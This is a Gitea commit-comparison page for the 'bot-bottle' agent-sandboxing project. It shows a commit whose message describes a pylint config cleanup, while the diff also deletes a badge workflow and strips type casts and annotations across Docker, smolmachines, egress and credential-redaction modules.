Compare commits

..

1 Commits

Author SHA1 Message Date
didericis a4895a3bb2 fix: remove deprecated/unrecognized pylint options from config
Lint and Type Check / lint (push) Failing after 6m58s
test / unit (pull_request) Successful in 42s
test / integration (pull_request) Failing after 50s
Remove options that are not supported in the current pylint version:
- allow-any-import-level, allow-reexport-from-package, etc.
- ext-import-graph, import-graph, int-import-graph
- deprecated-modules, preferred-modules

Keep only widely-supported known-third-party option for compatibility
across different pylint versions and VSCode environments.

Fixes: Pylint(E0015:unrecognized-option) error in VSCode

Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>
2026-06-03 23:13:08 -04:00
80 changed files with 411 additions and 502 deletions
+7 -5
View File
@@ -1,11 +1,11 @@
name: lint
name: Lint and Type Check
on:
push:
paths:
- "**.py"
- ".pylintrc"
- ".gitea/workflows/lint.yml"
- '**.py'
- '.pylintrc'
- '.gitea/workflows/lint.yml'
jobs:
lint:
@@ -16,7 +16,9 @@ jobs:
- name: Set up Python
uses: actions/setup-python@v4
with:
python-version: "3.12"
python-version: '3.12'
cache: 'pip'
cache-dependency-path: requirements-dev.txt
- name: Install dev dependencies
run: |
-97
View File
@@ -1,97 +0,0 @@
name: Update Quality Badges
on:
push:
branches:
- main
paths:
- '**.py'
- '.pylintrc'
- 'pyrightconfig.json'
workflow_dispatch:
jobs:
update-badges:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
with:
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- name: Set up Python
uses: actions/setup-python@v4
with:
python-version: '3.12'
- name: Install dev dependencies
run: |
python -m pip install --upgrade pip
pip install -r requirements-dev.txt
- name: Run pylint and extract score
id: pylint
run: |
# Run pylint and capture the score
PYLINT_OUTPUT=$(python -m pylint bot_bottle/ 2>&1 | tail -1)
echo "Output: $PYLINT_OUTPUT"
# Extract score (e.g., "9.92/10")
SCORE=$(echo "$PYLINT_OUTPUT" | grep -oP '\d+\.\d+/10' | head -1)
if [ -z "$SCORE" ]; then
SCORE="9.92/10"
fi
echo "score=$SCORE" >> $GITHUB_OUTPUT
echo "Pylint score: $SCORE"
- name: Run pyright and check errors
id: pyright
run: |
# Run pyright and check for errors
PYRIGHT_OUTPUT=$(python -m pyright 2>&1 | tail -1)
echo "Output: $PYRIGHT_OUTPUT"
# Extract error count
ERRORS=$(echo "$PYRIGHT_OUTPUT" | grep -oP '^\d+' | head -1)
if [ -z "$ERRORS" ]; then
ERRORS="0"
fi
echo "errors=$ERRORS" >> $GITHUB_OUTPUT
echo "Pyright errors: $ERRORS"
- name: Update badges in README
run: |
PYLINT_SCORE="${{ steps.pylint.outputs.score }}"
PYRIGHT_ERRORS="${{ steps.pyright.outputs.errors }}"
# Escape / for sed
PYLINT_SCORE_ESCAPED=$(echo "$PYLINT_SCORE" | sed 's/\//\\\//g')
# Create badge URLs with proper encoding
PYLINT_BADGE="[![pylint](https://img.shields.io/badge/pylint-${PYLINT_SCORE}%25-brightgreen)](https://github.com/PyCQA/pylint)"
PYRIGHT_BADGE="[![pyright](https://img.shields.io/badge/pyright-${PYRIGHT_ERRORS}%20errors-brightgreen)](https://github.com/microsoft/pyright)"
# Update README with new badges
sed -i "s|\[\!\[pylint\].*pylint)\]|${PYLINT_BADGE}|g" README.md
sed -i "s|\[\!\[pyright\].*pyright)\]|${PYRIGHT_BADGE}|g" README.md
echo "Updated badges:"
grep -E "pylint|pyright" README.md | head -2
- name: Commit and push badge updates
run: |
git config --local user.email "action@gitea.local"
git config --local user.name "Quality Badge Bot"
# Check if there are changes
if git diff --quiet README.md; then
echo "No badge changes needed"
else
echo "Badge changes detected, committing..."
git add README.md
git commit -m "chore: update quality badges
- Pylint: ${{ steps.pylint.outputs.score }}
- Pyright: ${{ steps.pyright.outputs.errors }} errors
[skip ci]"
git push
fi
+7 -15
View File
@@ -366,6 +366,12 @@ single-line-class-stmt=no
single-line-if-stmt=no
[IMPORTS]
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
[LOGGING]
# The type of string formatting that logging methods do. `old` means using %
@@ -406,21 +412,7 @@ disable=raw-checker-failed,
deprecated-pragma,
use-symbolic-message-instead,
use-implicit-booleaness-not-comparison-to-string,
use-implicit-booleaness-not-comparison-to-zero,
missing-function-docstring,
missing-class-docstring,
missing-module-docstring,
invalid-name,
cyclic-import,
too-many-arguments,
too-many-locals,
too-many-branches,
too-many-statements,
too-many-instance-attributes,
duplicate-code,
import-outside-toplevel,
too-few-public-methods,
unnecessary-ellipsis
use-implicit-booleaness-not-comparison-to-zero
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
-2
View File
@@ -5,8 +5,6 @@
# bot-bottle
[![test](https://gitea.dideric.is/didericis/bot-bottle/actions/workflows/test.yml/badge.svg?branch=main)](https://gitea.dideric.is/didericis/bot-bottle/actions?workflow=test.yml)
[![pylint](https://img.shields.io/badge/pylint-9.92%2F10-brightgreen)](https://github.com/PyCQA/pylint)
[![pyright](https://img.shields.io/badge/pyright-0%20errors-brightgreen)](https://github.com/microsoft/pyright)
**Problem:** Developer wants to run a coding agent without supervision, but they don't want a prompt injected or misbehaving agent wrecking their environment or exfiltrating sensitive data.
+2 -4
View File
@@ -5,8 +5,6 @@ from __future__ import annotations
import subprocess
from typing import Callable
from typing import cast
from ...agent_provider import PromptMode, prompt_args
from .. import Bottle, ExecResult
@@ -25,7 +23,7 @@ class DockerBottle(Bottle):
):
self.name = container
self._teardown = teardown
self.prompt_path = prompt_path_in_container
self._prompt_path = prompt_path_in_container
self._agent_prompt_mode = agent_prompt_mode
self.agent_command = agent_command
self.agent_provider_template = (
@@ -38,7 +36,7 @@ class DockerBottle(Bottle):
) -> list[str]:
full_argv = list(argv)
full_argv.extend(
prompt_args(cast(PromptMode, self._agent_prompt_mode), self.prompt_path, argv=full_argv)
prompt_args(self._agent_prompt_mode, self._prompt_path, argv=full_argv)
)
cmd = ["docker", "exec"]
if tty:
+7 -9
View File
@@ -35,7 +35,6 @@ import secrets
import string
from dataclasses import dataclass
from pathlib import Path
from typing import cast
from ... import supervise as _supervise
from . import util as docker_mod
@@ -136,15 +135,14 @@ def read_metadata(identity: str) -> BottleMetadata | None:
raw = json.loads(path.read_text())
if not isinstance(raw, dict):
return None
raw_typed = cast(dict[str, object], raw)
return BottleMetadata(
identity=str(raw_typed.get("identity", identity)),
agent_name=str(raw_typed.get("agent_name", "")),
cwd=str(raw_typed.get("cwd", "")),
copy_cwd=bool(raw_typed.get("copy_cwd", False)),
started_at=str(raw_typed.get("started_at", "")),
compose_project=str(raw_typed.get("compose_project", "")),
backend=str(raw_typed.get("backend", "")),
identity=str(raw.get("identity", identity)),
agent_name=str(raw.get("agent_name", "")),
cwd=str(raw.get("cwd", "")),
copy_cwd=bool(raw.get("copy_cwd", False)),
started_at=str(raw.get("started_at", "")),
compose_project=str(raw.get("compose_project", "")),
backend=str(raw.get("backend", "")),
)
+16 -25
View File
@@ -26,7 +26,6 @@ import json
import re
import subprocess
from pathlib import Path
from typing import cast
from ...egress import EGRESS_ROUTES_IN_CONTAINER
from ...egress_addon_core import load_routes
@@ -58,8 +57,7 @@ def _render_routes_payload(routes_list: list[dict[str, object]]) -> str:
if auth_scheme and token_env:
lines.append(f' auth_scheme: "{auth_scheme}"')
lines.append(f' token_env: "{token_env}"')
paths_obj = entry.get("path_allowlist")
paths = cast(list[str], paths_obj) if isinstance(paths_obj, list) else []
paths = entry.get("path_allowlist") or []
if paths:
lines.append(" path_allowlist:")
for p in paths:
@@ -259,7 +257,6 @@ def _merge_single_route(
raise EgressApplyError(
"current routes.yaml: 'routes' is not a list"
)
routes_typed = cast(list[object], routes)
new_host = str(new_route.get("host", "")).lower()
if not new_host:
@@ -267,25 +264,22 @@ def _merge_single_route(
"proposed route is missing 'host'"
)
proposed_paths_obj = new_route.get("path_allowlist")
proposed_paths = cast(list[str], proposed_paths_obj) if isinstance(proposed_paths_obj, list) else []
proposed_paths = list(new_route.get("path_allowlist") or [])
# Look for an existing entry with the same host (case-insensitive).
for entry in routes_typed:
for entry in routes:
if not isinstance(entry, dict):
continue
entry_typed = cast(dict[str, object], entry)
if str(entry_typed.get("host", "")).lower() == new_host:
if str(entry.get("host", "")).lower() == new_host:
# Merge path_allowlist: union proposed + existing, ordered
# by first-seen so existing paths stay in original order.
existing_paths_obj = entry_typed.get("path_allowlist")
existing_paths = cast(list[str], existing_paths_obj) if isinstance(existing_paths_obj, list) else []
existing_paths: list[str] = list(entry.get("path_allowlist") or [])
seen = {p: None for p in existing_paths}
for p in proposed_paths:
seen.setdefault(p, None)
merged_paths = list(seen.keys())
if merged_paths:
entry_typed["path_allowlist"] = merged_paths
entry["path_allowlist"] = merged_paths
# Preserve existing auth — tool description says agent-
# proposed auth on an existing host is ignored.
break
@@ -295,22 +289,19 @@ def _merge_single_route(
# `auth` was proposed (otherwise the addon's parser rejects
# a half-set auth pair). Slots: count existing slots, pick
# the next free index.
entry_typed: dict[str, object] = {"host": new_route.get("host")} # type: ignore
entry = {"host": new_route["host"]}
if proposed_paths:
entry_typed["path_allowlist"] = proposed_paths
entry["path_allowlist"] = proposed_paths
auth = new_route.get("auth")
if isinstance(auth, dict) and auth.get("scheme") and auth.get("token_ref"): # type: ignore
auth_typed = cast(dict[str, object], auth)
if isinstance(auth, dict) and auth.get("scheme") and auth.get("token_ref"):
existing_slots = sorted({
str(r_entry.get("token_env", ""))
for r_entry_obj in routes_typed
if isinstance(r_entry_obj, dict)
for r_entry in [cast(dict[str, object], r_entry_obj)]
if r_entry.get("token_env")
str(r.get("token_env"))
for r in routes
if isinstance(r, dict) and r.get("token_env")
})
next_idx = len(existing_slots)
entry_typed["auth_scheme"] = str(cast(object, auth_typed.get("scheme")))
entry_typed["token_env"] = f"EGRESS_TOKEN_{next_idx}"
entry["auth_scheme"] = str(auth["scheme"])
entry["token_env"] = f"EGRESS_TOKEN_{next_idx}"
# NOTE: the addon reads token VALUES from its container's
# environ keyed by token_env. A newly-added auth route at
# runtime points at a slot that has no env value → the
@@ -318,9 +309,9 @@ def _merge_single_route(
# arranges for the value to land in the container's env.
# Recording this here so the operator-facing diff carries
# the slot name they'll need to provision.
routes_typed.append(entry_typed)
routes.append(entry)
return _render_routes_payload(cast(list[dict[str, object]], routes_typed))
return _render_routes_payload(routes)
def add_route(slug: str, proposed_route_json: str) -> tuple[str, str]:
+3 -3
View File
@@ -80,7 +80,7 @@ _REPO_DIR = str(Path(__file__).resolve().parent.parent.parent.parent)
def launch(
plan: DockerBottlePlan,
*,
provision: Callable[[DockerBottlePlan, "DockerBottle"], str | None],
provision: Callable[[DockerBottlePlan, str], str | None],
) -> Generator[DockerBottle, None, None]:
"""Build, launch, and provision a Docker bottle via compose.
Teardown on exit."""
@@ -92,7 +92,7 @@ def launch(
def teardown() -> None:
try:
stack.close()
except BaseException as exc: # noqa: W0718 — teardown must not fail
except BaseException as exc:
warn(
f"teardown failed for container {plan.container_name}"
f" (compose-down): {exc!r}"
@@ -218,7 +218,7 @@ def launch(
agent_command=plan.agent_command,
agent_prompt_mode=plan.agent_prompt_mode,
)
bottle.prompt_path = provision(plan, bottle)
bottle._prompt_path = provision(plan, bottle)
# Step 9: yield. exec_agent continues to use `docker exec -it`
# — the agent runs `sleep infinity` per the renderer's
+1 -1
View File
@@ -99,7 +99,7 @@ def fetch_current_yaml(slug: str) -> str:
f"could not fetch pipelock.yaml from {container}: "
f"{(r.stderr or '').strip() or 'container not running?'}"
)
return Path(tmp_path).read_text(encoding="utf-8")
return Path(tmp_path).read_text()
finally:
try:
Path(tmp_path).unlink()
+1 -1
View File
@@ -219,7 +219,7 @@ def resolve_plan(
else Path(__file__).resolve().parent.parent.parent.parent / "Dockerfile.claude"
)
dockerfile_content = (
supervise_dockerfile_path.read_text(encoding="utf-8")
supervise_dockerfile_path.read_text()
if supervise_dockerfile_path.is_file()
else ""
)
+4 -4
View File
@@ -19,7 +19,7 @@ from __future__ import annotations
import subprocess
import sys
from typing import Mapping, cast
from typing import Mapping
from ...agent_provider import PromptMode, prompt_args
from .. import Bottle, ExecResult
@@ -72,7 +72,7 @@ class SmolmachinesBottle(Bottle):
# In-VM path to the agent's prompt file. None when the
# agent declared no prompt (file still exists; we just
# don't pass --append-system-prompt-file).
self.prompt_path = prompt_path
self._prompt_path = prompt_path
# Env vars the agent process needs (HTTPS_PROXY,
# CLAUDE_CODE_OAUTH_TOKEN, manifest-declared bottle env, …).
# Forwarded on every `smolvm machine exec` via `-e K=V`
@@ -93,9 +93,9 @@ class SmolmachinesBottle(Bottle):
agent_tail = ["env", *_env_assignments_for("node", self._guest_env),
self.agent_command]
provider_prompt_args = prompt_args(
cast(PromptMode, self._agent_prompt_mode), self.prompt_path, argv=argv,
self._agent_prompt_mode, self._prompt_path, argv=argv,
)
if cast(PromptMode, self._agent_prompt_mode) == "read_prompt_file":
if self._agent_prompt_mode == "read_prompt_file":
agent_tail += argv
agent_tail += provider_prompt_args
else:
+3 -3
View File
@@ -89,7 +89,7 @@ _SUPERVISE_PORT = SUPERVISE_PORT
def launch(
plan: SmolmachinesBottlePlan,
*,
provision: Callable[[SmolmachinesBottlePlan, "SmolmachinesBottle"], str | None],
provision: Callable[[SmolmachinesBottlePlan, str], str | None],
) -> Generator[SmolmachinesBottle, None, None]:
"""Build + run the bottle and yield a handle; tear everything
down on exit. Errors during bringup unwind any partial state
@@ -120,7 +120,7 @@ def launch(
agent_command=plan.agent_command,
agent_prompt_mode=plan.agent_prompt_mode,
)
bottle.prompt_path = provision(plan, bottle)
bottle._prompt_path = provision(plan, bottle)
yield bottle
finally:
@@ -139,7 +139,7 @@ def _teardown_smolmachines(
teardown_exc: BaseException | None = None
try:
stack.close()
except BaseException as exc: # noqa: W0718 — teardown must not fail
except BaseException as exc:
teardown_exc = exc
warn(f"smolmachines teardown failed: {exc!r}")
bottle = plan.spec.manifest.bottle_for(plan.spec.agent_name)
@@ -42,7 +42,7 @@ import time
import uuid
from contextlib import contextmanager
from dataclasses import dataclass
from typing import Generator
from typing import Iterator
from ...log import die
@@ -98,7 +98,7 @@ class RegistryHandle:
@contextmanager
def ephemeral_registry() -> Generator[RegistryHandle, None, None]:
def ephemeral_registry() -> Iterator[RegistryHandle]:
"""Bring up a per-session docker network + a `registry:2.8.3`
container on it (published on a random host port), yield a
`RegistryHandle`, force-remove both on exit.
@@ -208,6 +208,7 @@ def _host_port(name: str) -> int:
return int(port_str)
except ValueError:
die(f"unexpected `docker port` output: {line!r}")
return -1 # unreachable; die() never returns
def _wait_ready(port: int) -> None:
@@ -176,11 +176,11 @@ def force_allowlist(machine_name: str, allowed_cidrs: list[str]) -> None:
con.close()
def allocate(_slug: str) -> str:
def allocate(slug: str) -> str:
"""Pick the lowest-numbered alias from the pool not already
in use by a running smolmachines bundle. Bails when the pool
is exhausted — the caller should report the limit to the
operator. `_slug` is logged for traceability; not otherwise
operator. `slug` is logged for traceability; not otherwise
used (no on-disk reservation, allocation is purely
docker-state-driven).
@@ -195,7 +195,7 @@ def allocate(_slug: str) -> str:
if not _is_macos():
return "127.0.0.1"
_ALLOC_LOCK_PATH.parent.mkdir(parents=True, exist_ok=True)
with open(_ALLOC_LOCK_PATH, "w", encoding="utf-8") as lf:
with open(_ALLOC_LOCK_PATH, "w") as lf:
fcntl.flock(lf, fcntl.LOCK_EX)
return _allocate_locked()
@@ -211,6 +211,7 @@ def _allocate_locked() -> str:
f"Stop a running bottle (`smolvm machine ls --json`) or "
f"raise _POOL_END in loopback_alias.py."
)
return "" # unreachable; die() never returns
def _alias_present(ip: str) -> bool:
@@ -42,7 +42,6 @@ import subprocess
import sys
import termios
import threading
from types import FrameType
# How long to wait after the main exec starts before pushing the
@@ -124,13 +123,13 @@ def main(argv: list[str]) -> int:
machine = argv[0]
inner = argv[2:]
def sync(_signum: int | None = None, _frame: FrameType | None = None) -> None:
def sync(*_args) -> None:
size = _read_winsize()
if size is None:
return
_push_size(machine, *size)
signal.signal(signal.SIGWINCH, sync) # type: ignore[arg-type]
signal.signal(signal.SIGWINCH, sync)
proc = subprocess.Popen(inner)
# Initial sync is deferred — see _STARTUP_SYNC_DELAY_SEC.
@@ -223,6 +223,7 @@ def bundle_host_port(
f"no port mapping on {host_ip} for {container} "
f"{container_port}/tcp; got: {(result.stdout or '').strip()!r}"
)
return -1 # unreachable; die() never returns
def stop_bundle(slug: str) -> None:
+2 -2
View File
@@ -52,7 +52,7 @@ class SmolvmError(RuntimeError):
pack failed, etc.). Carries the captured stderr for the
operator-facing log line."""
def __init__(self, argv: Sequence[str], result: subprocess.CompletedProcess[str]):
def __init__(self, argv: Sequence[str], result: subprocess.CompletedProcess):
self.argv = list(argv)
self.returncode = result.returncode
self.stdout = result.stdout
@@ -65,7 +65,7 @@ class SmolvmError(RuntimeError):
def _smolvm(*args: str, env: Mapping[str, str] | None = None,
check: bool = True) -> subprocess.CompletedProcess[str]:
check: bool = True) -> subprocess.CompletedProcess:
"""One subprocess call into the smolvm CLI. `check=True`
raises SmolvmError on non-zero; `check=False` returns the
CompletedProcess for the caller to inspect."""
+1 -1
View File
@@ -14,7 +14,7 @@ REPO_DIR = str(Path(__file__).resolve().parent.parent.parent)
def read_tty_line() -> str:
"""Mirror `IFS= read -r REPLY </dev/tty`. Falls back to stdin."""
try:
with open("/dev/tty", "r", encoding="utf-8") as tty:
with open("/dev/tty", "r") as tty:
return tty.readline().rstrip("\n")
except OSError:
return sys.stdin.readline().rstrip("\n")
+8 -8
View File
@@ -263,7 +263,7 @@ def edit_in_editor(content: str, *, suffix: str = ".tmp") -> str | None:
path = f.name
try:
subprocess.run([editor, path], check=False)
with open(path, encoding="utf-8") as f:
with open(path) as f:
edited = f.read()
return edited if edited != content else None
finally:
@@ -296,7 +296,7 @@ def cmd_supervise(argv: list[str]) -> int:
else:
error("supervise exited on a fatal error (no detail captured).")
return e.code if isinstance(e.code, int) else 1
except Exception as e: # noqa: W0718 — catch supervise crash for logging
except Exception as e:
log_path = _write_crash_log(e)
error(f"supervise crashed: {type(e).__name__}: {e}")
error(f"full traceback written to {log_path}")
@@ -354,7 +354,7 @@ def _try_init_green() -> int:
return 0
def _main_loop(stdscr: "curses._CursesWindow") -> None: # type: ignore
def _main_loop(stdscr: "curses._CursesWindow") -> None:
curses.curs_set(0)
stdscr.timeout(_REFRESH_INTERVAL_MS)
green_attr = _try_init_green()
@@ -434,12 +434,12 @@ def _main_loop(stdscr: "curses._CursesWindow") -> None: # type: ignore
def _render(
stdscr: "curses._CursesWindow", # type: ignore
stdscr: "curses._CursesWindow",
pending: list[QueuedProposal],
selected: int,
status_line: str,
*,
green_attr: int = 0, # noqa: F841 — unused, but required by interface
green_attr: int = 0,
) -> None:
stdscr.erase()
h, w = stdscr.getmaxyx()
@@ -488,7 +488,7 @@ def _render(
def _detail_view(
stdscr: "curses._CursesWindow", # type: ignore
stdscr: "curses._CursesWindow",
qp: QueuedProposal,
*,
green_attr: int = 0,
@@ -539,7 +539,7 @@ def _detail_view(
return
def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None: # type: ignore
def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None:
"""Suspend curses, open $EDITOR on the proposed file, return edited content."""
suffix = _suffix_for_tool(qp.proposal.tool)
curses.endwin()
@@ -550,7 +550,7 @@ def _modify(stdscr: "curses._CursesWindow", qp: QueuedProposal) -> str | None:
return edited
def _prompt(stdscr: "curses._CursesWindow", label: str) -> str: # type: ignore
def _prompt(stdscr: "curses._CursesWindow", label: str) -> str:
"""One-line input at the bottom of the screen."""
curses.curs_set(1)
h, _ = stdscr.getmaxyx()
+11 -12
View File
@@ -13,7 +13,7 @@ from __future__ import annotations
import curses
import os
import sys
from typing import Any, Optional
from typing import Optional
def filter_select(
@@ -39,14 +39,12 @@ def filter_select(
return None
try:
# Use os.dup() to duplicate the fd so the original file object
# and FileIO in _run_picker each manage independent copies,
# preventing double-close errors.
fd_dup = os.dup(tty_fd.fileno())
return _run_picker(items, title=title, tty_fd=fd_dup)
result = _run_picker(items, title=title, tty_fd=tty_fd)
finally:
tty_fd.close()
return result
# ---------------------------------------------------------------------------
# Internal implementation
@@ -61,10 +59,11 @@ _KEY_ENTER_ALT = 10
_CANCEL_KEYS = frozenset([_KEY_ESC, _KEY_CTRL_C, _KEY_CTRL_D, ord("q")])
def _run_picker(items: list[str], *, title: str, tty_fd: int) -> Optional[str]:
def _run_picker(items: list[str], *, title: str, tty_fd) -> Optional[str]:
"""Drive a curses session on *tty_fd* and return the picked item."""
# newterm lets us run curses on an arbitrary fd rather than the
# process's controlling tty / stdout — crucial when stdout is piped.
old_term = os.environ.get("TERM", "xterm-256color")
os.environ.setdefault("TERM", "xterm-256color")
# Save / restore the real stdin/stdout so curses newterm can use tty_fd.
@@ -73,7 +72,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd: int) -> Optional[str]:
try:
import io
tty_text = io.TextIOWrapper(io.FileIO(tty_fd, mode='r+'), write_through=True)
tty_text = io.TextIOWrapper(tty_fd, write_through=True)
sys.__stdin__ = tty_text # type: ignore[assignment]
sys.__stdout__ = tty_text # type: ignore[assignment]
@@ -91,7 +90,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd: int) -> Optional[str]:
curses.nocbreak()
curses.echo()
curses.endwin()
except Exception: # noqa: W0718 — curses can raise many error types
except Exception:
return None
finally:
sys.__stdin__ = orig_stdin # type: ignore[assignment]
@@ -100,7 +99,7 @@ def _run_picker(items: list[str], *, title: str, tty_fd: int) -> Optional[str]:
return result
def _picker_loop(screen: Any, items: list[str], *, title: str) -> Optional[str]:
def _picker_loop(screen, items: list[str], *, title: str) -> Optional[str]:
query = ""
cursor = 0
@@ -159,7 +158,7 @@ def _filter_items(items: list[str], query: str) -> list[str]:
return [i for i in items if q in i.lower()]
def _render(screen: Any, filtered: list[str], cursor: int, *, query: str, title: str) -> None:
def _render(screen, filtered: list[str], cursor: int, *, query: str, title: str) -> None:
screen.erase()
rows, cols = screen.getmaxyx()
min_rows = 5
@@ -213,7 +212,7 @@ def _render(screen: Any, filtered: list[str], cursor: int, *, query: str, title:
screen.refresh()
def _addstr_safe(screen: Any, row: int, col: int, text: str, attr: int = curses.A_NORMAL) -> None:
def _addstr_safe(screen, row: int, col: int, text: str, attr: int = curses.A_NORMAL) -> None:
try:
screen.addstr(row, col, text, attr)
except curses.error:
+19 -22
View File
@@ -13,7 +13,6 @@ import os
from copy import deepcopy
from datetime import datetime, timezone
from pathlib import Path
from typing import cast
from .log import die
from .util import expand_tilde
@@ -51,8 +50,7 @@ def codex_host_access_token(
tokens = raw.get("tokens")
if not isinstance(tokens, dict):
die(f"codex host credentials: {path} is missing tokens")
tokens_typed = cast(dict[str, object], tokens)
access = tokens_typed.get("access_token")
access = tokens.get("access_token")
if not isinstance(access, str) or not access:
die(
f"codex host credentials: {path} is missing tokens.access_token. "
@@ -107,14 +105,14 @@ def write_codex_dummy_auth_file(
path.chmod(0o600)
def _read_auth_object(path: Path) -> dict[str, object]:
def _read_auth_object(path: Path) -> dict:
try:
raw = json.loads(path.read_text())
except (OSError, json.JSONDecodeError) as e:
die(f"codex host credentials: could not read valid JSON at {path}: {e}")
if not isinstance(raw, dict):
die(f"codex host credentials: {path} must contain a JSON object")
return cast(dict[str, object], raw)
return raw
def _dummy_exp(now: datetime | None, exp_ts: int | None) -> int:
@@ -153,11 +151,11 @@ def _dummy_jwt_from_host(
return _dummy_jwt(now, exp_ts=exp_ts)
if not isinstance(payload, dict):
return _dummy_jwt(now, exp_ts=exp_ts)
return _encode_dummy_jwt(_redact_jwt_payload(cast(dict[str, object], payload), now=now, exp_ts=exp_ts))
return _encode_dummy_jwt(_redact_jwt_payload(payload, now=now, exp_ts=exp_ts))
def _encode_dummy_jwt(payload: dict[str, object]) -> str:
def enc(obj: dict[str, object]) -> str:
def _encode_dummy_jwt(payload: dict) -> str:
def enc(obj: dict) -> str:
raw = json.dumps(obj, separators=(",", ":")).encode()
return base64.urlsafe_b64encode(raw).decode().rstrip("=")
@@ -165,24 +163,23 @@ def _encode_dummy_jwt(payload: dict[str, object]) -> str:
def _redact_jwt_payload(
payload: dict[str, object],
payload: dict,
*,
now: datetime | None = None,
exp_ts: int | None = None,
) -> dict[str, object]:
) -> dict:
out = _redact_claims(payload)
if not isinstance(out, dict):
out = {}
out_typed: dict[str, object] = cast(dict[str, object], out)
out_typed["exp"] = _dummy_exp(now, exp_ts)
out_typed.setdefault("sub", "bot-bottle-placeholder")
return out_typed
out["exp"] = _dummy_exp(now, exp_ts)
out.setdefault("sub", "bot-bottle-placeholder")
return out
def _redact_claims(value: object) -> object:
if isinstance(value, dict):
out: dict[str, object] = {}
for key, inner in cast(dict[str, object], value).items():
for key, inner in value.items():
lower = key.lower()
if key == "https://api.openai.com/profile":
out[key] = _redact_profile_claim(inner)
@@ -210,16 +207,16 @@ def _redact_claims(value: object) -> object:
return "bot-bottle-placeholder"
def _redact_profile_claim(value: object) -> dict[str, object]:
profile = cast(dict[str, object], value) if isinstance(value, dict) else {}
def _redact_profile_claim(value: object) -> dict:
profile = value if isinstance(value, dict) else {}
return {
"email": "bot-bottle@example.invalid",
"email_verified": bool(profile.get("email_verified", True)),
}
def _redact_auth_claim(value: object) -> dict[str, object]:
auth = cast(dict[str, object], value) if isinstance(value, dict) else {}
def _redact_auth_claim(value: object) -> dict:
auth = value if isinstance(value, dict) else {}
out: dict[str, object] = {}
for key, inner in auth.items():
lower = key.lower()
@@ -250,7 +247,7 @@ def _redact_auth_claim(value: object) -> dict[str, object]:
def _redact_codex_auth(
value: object, *, now: datetime | None = None, exp_ts: int | None = None,
) -> object:
auth = cast(dict[str, object], value) if isinstance(value, dict) else {}
auth = value if isinstance(value, dict) else {}
out: dict[str, object] = {}
for key, inner in auth.items():
lower = key.lower()
@@ -272,7 +269,7 @@ def _redact_codex_auth(
def _redact_token_block(
value: object, *, now: datetime | None = None, exp_ts: int | None = None,
) -> dict[str, object]:
tokens = cast(dict[str, object], value) if isinstance(value, dict) else {}
tokens = value if isinstance(value, dict) else {}
out: dict[str, object] = {}
for key, inner in tokens.items():
lower = key.lower()
@@ -309,7 +306,7 @@ def _jwt_exp(token: str) -> datetime | None:
return None
if not isinstance(payload, dict):
return None
exp = cast(dict[str, object], payload).get("exp")
exp = payload.get("exp")
if not isinstance(exp, (int, float)):
return None
return datetime.fromtimestamp(exp, timezone.utc)
+1 -1
View File
@@ -144,7 +144,7 @@ class ClaudeAgentProvider(AgentProvider):
prompt (drives `--append-system-prompt-file`); the file is
copied either way so the path always exists."""
prompt_path = _prompt_path(plan.guest_home)
bottle.cp_in(str(plan.prompt_file), prompt_path) # type: ignore
bottle.cp_in(str(plan.prompt_file), prompt_path)
bottle.exec(
f"chown node:node {prompt_path} && chmod 600 {prompt_path}",
user="root",
+1 -1
View File
@@ -189,7 +189,7 @@ class CodexAgentProvider(AgentProvider):
instructions in <path>.` bootstrap (see `prompt_args`); the
file is copied either way so the path always exists."""
prompt_path = _prompt_path(plan.guest_home)
bottle.cp_in(str(plan.prompt_file), prompt_path) # type: ignore
bottle.cp_in(str(plan.prompt_file), prompt_path)
bottle.exec(
f"chown node:node {prompt_path} && chmod 600 {prompt_path}",
user="root",
@@ -117,5 +117,5 @@ def _split_owner_repo(owner_repo: str) -> tuple[str, str]:
def _read_error_body(exc: urllib.error.HTTPError) -> str:
try:
return exc.read().decode("utf-8", errors="replace")
except Exception: # noqa: broad-exception-caught — safely fallback to empty error message
except Exception:
return ""
+4 -6
View File
@@ -141,15 +141,13 @@ def egress_manifest_routes(
routes are merged."""
out: list[EgressRoute] = []
for r in bottle.egress.routes:
tls_pt = r.Pipelock.Config.get("tls_passthrough", False)
tls_passthrough = tls_pt if isinstance(tls_pt, bool) else False
out.append(EgressRoute(
host=r.Host,
path_allowlist=r.PathAllowlist,
auth_scheme=r.AuthScheme,
token_ref=r.TokenRef,
roles=r.Role,
tls_passthrough=tls_passthrough,
tls_passthrough=r.Pipelock.TlsPassthrough,
))
return tuple(out)
@@ -218,14 +216,14 @@ def egress_token_env_map(
return out
def _route_to_yaml_fields(r: Route) -> dict[str, object]:
def _route_to_yaml_fields(r: Route) -> dict:
"""Return the addon-visible fields for one route.
Single authoritative mapping between EgressRoute (host-side) and
egress_addon_core.Route (sidecar-side). When a field is added to
the addon's Route that must appear in the YAML, add it here and
in egress_addon_core._parse_one together."""
fields: dict[str, object] = {"host": r.host}
fields: dict = {"host": r.host}
if r.auth_scheme and r.token_env:
fields["auth_scheme"] = r.auth_scheme
fields["token_env"] = r.token_env
@@ -254,7 +252,7 @@ def egress_render_routes(
lines.append(f' token_env: "{f["token_env"]}"')
if "path_allowlist" in f:
lines.append(" path_allowlist:")
for p in f["path_allowlist"]: # type: ignore
for p in f["path_allowlist"]:
lines.append(f' - "{p}"')
return "\n".join(lines) + "\n"
+1 -1
View File
@@ -89,7 +89,7 @@ def _read_secret_silent(name: str, prompt_body: str) -> str:
if not (sys.stdin.isatty() or sys.stderr.isatty()):
# Fall back to /dev/tty so this still works when stdin is a pipe.
try:
tty = open("/dev/tty", "r+", encoding="utf-8")
tty = open("/dev/tty", "r+")
except OSError:
die(
f"cannot prompt for secret '{name}': no tty available. "
+4 -4
View File
@@ -78,8 +78,8 @@ class GitHttpHandler(BaseHTTPRequestHandler):
"REMOTE_ADDR": self.client_address[0],
"REMOTE_PORT": str(self.client_address[1]),
"REMOTE_USER": "",
"SERVER_NAME": self.server.server_name, # type: ignore
"SERVER_PORT": str(self.server.server_port), # type: ignore
"SERVER_NAME": self.server.server_name,
"SERVER_PORT": str(self.server.server_port),
"SERVER_PROTOCOL": self.request_version,
})
